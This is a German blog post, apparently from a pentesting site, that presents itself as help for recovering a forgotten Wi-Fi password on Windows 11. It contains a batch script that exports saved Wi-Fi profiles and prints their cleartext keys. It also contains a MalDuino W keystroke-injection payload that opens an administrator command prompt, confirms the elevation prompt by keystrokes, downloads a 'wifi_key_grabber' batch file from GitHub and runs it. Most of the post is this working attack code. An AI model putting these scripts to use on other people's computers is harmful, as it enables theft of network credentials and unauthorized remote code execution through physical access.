MalDuino W – WLAN Passwörter auslesen

Es ist ein häufiges Szenario: Der Zugriff auf das eigene WLAN ist nicht mehr möglich, weil das Passwort vergessen wurde und der Zugang über den Router nicht mehr hergestellt werden kann. Gerade in Zeiten, in denen wir immer mehr Geräte miteinander vernetzen, kann es frustrierend sein, wenn plötzlich ein wichtiger Zugang zu einem Netzwerk fehlt. Besonders problematisch wird es, wenn man auf einem Windows 11 Laptop das WLAN-Passwort auslesen muss, aber keinen direkten Zugriff mehr auf den Router hat.

Die gute Nachricht ist, dass es eine Möglichkeit gibt, dieses Passwort wiederherzustellen – und zwar mit einem Skript, das speziell für Penetrationstester und IT-Experten entwickelt wurde. Mit diesem Skript kann das vergessene WLAN-Passwort ausgelesen werden, ohne dass der Router selbst zurückgesetzt oder neu konfiguriert werden muss.

Das Problem: 

Windows 11 speichert WLAN-Passwörter in der Regel lokal im System, so dass sie nach der ersten Verbindung mit einem Netzwerk weiter verwendet werden können. Leider gibt es keine einfache, eingebaute Möglichkeit, diese Passwörter direkt anzuzeigen. Viele Benutzer geraten in Panik, wenn sie das Passwort vergessen haben und es keine Möglichkeit zu geben scheint, sich wieder mit dem Netzwerk zu verbinden.

Die Herausforderung für Penetration-Tester und IT-Experten ist es, diese Passwörter zu extrahieren, insbesondere wenn der physische Zugang zum Router nicht mehr möglich ist und der Nutzer keine anderen Sicherungskopien des Passworts besitzt.

Die Lösung 

Genau für dieses Problem habe ich ein Skript entwickelt, das unter Windows 11 verwendet werden kann, um WLAN-Passwörter auszulesen. Das folgende Skript kann direkt auf dem Windows-PC ausgeführt werden. Dazu benötigt man Administratorrechte:

@echo off
setlocal enabledelayedexpansion

REM Pfad zum Ordner, in dem die XML-Dateien gespeichert werden sollen
set "folderPath=%USERPROFILE%\WLANProfiles"

REM Erstellen des Ordners, falls er nicht existiert
if not exist "%folderPath%" mkdir "%folderPath%"

REM Exportieren der WLAN-Profile in den angegebenen Ordner
netsh wlan export profile folder="%folderPath%" key=clear

REM Durchsuchen Sie den angegebenen Ordner nach XML-Dateien
for %%f in ("%folderPath%\*.xml") do (
    REM Initialisieren einer Variable, um den keyMaterial-Wert zu speichern
    set "keyMaterial="

    REM Lesen der Datei zeilenweise
    for /f "tokens=*" %%l in ('type "%%f" ^| findstr /i "<keyMaterial>"') do (
        REM Extrahieren des Wertes zwischen den Tags
        set "line=%%l"
        set "line=!line:*<keyMaterial>=!"
        for /f "delims=<" %%t in ("!line!") do (
            set "keyMaterial=%%t"
        )
    )

    REM Anzeigen des extrahierten keyMaterial-Wertes
    if defined keyMaterial (
        echo keyMaterial in %%~nxf: !keyMaterial!
    )
)

endlocal
pause

Wer einen MalDuinow W zur Hand hat, kann auch eines der beiden Skripte verwenden, die auf Github abgelegt sind. Dabei wird die Batch-Datei direkt von Github heruntergeladen und auf dem PC ausgeführt. Dazu wird entweder die Kommandozeile oder die PowerShell verwendet. Hier die Version über die Kommandozeile:

REM ------------------------------------------------------------------------------------------------------
REM                                       Cmd Edition
REM  The script automates the process of downloading and executing a batch 
REM  file that retrieves Wi-Fi passwords stored on the system. It runs in the 
REM  currently logged-in Windows profile and displays the retrieved passwords 
REM  on the screen. The script uses keystrokes to run the necessary commands
REM  and visually indicates progress with LED color changes.
REM Pentestit.de - Frank Neugebauer (2025-03-25)
REM Currently supported layouts: DE, GB, US, ES, FR, DK, RU
REM Change language in the first line
REM -----------------------------------------------------------------------------------------------------
LOCALE DE
DEFAULTDELAY 2000
REM LED off
LED 0 0 0
REM LED red
LED 255 0 0
REM Run cmd as Administrator
GUI r
REM LED blue
LED 0 0 255
STRING cmd
CTRL SHIFT ENTER
TAB
TAB
TAB
ENTER
STRING bitsadmin /transfer mydownloadjob /download /priority high "https://raw.githubusercontent.com/eaglefn/malduinow/refs/heads/main/wifi_key_grabber.bat" %temp%\wifi.bat
ENTER
STRING cd %temp%
ENTER
STRING wifi.bat
ENTER
REM LED green
LED 0 255 0

Beide Skripte nutzen Windows-Tools, um gespeicherte WLAN-Passwörter aufzulisten und anzuzeigen.

Mit diesem Ansatz können Penetrationstester und IT-Profis schnell und sicher auf gespeicherte WLAN-Passwörter zugreifen – ohne dass der Router zurückgesetzt oder die Verbindung manuell wiederhergestellt werden muss.

Diese Seite verwendet Cookies, um die Nutzerfreundlichkeit zu verbessern. Mit der weiteren Verwendung stimmst du dem zu.

Datenschutzerklärung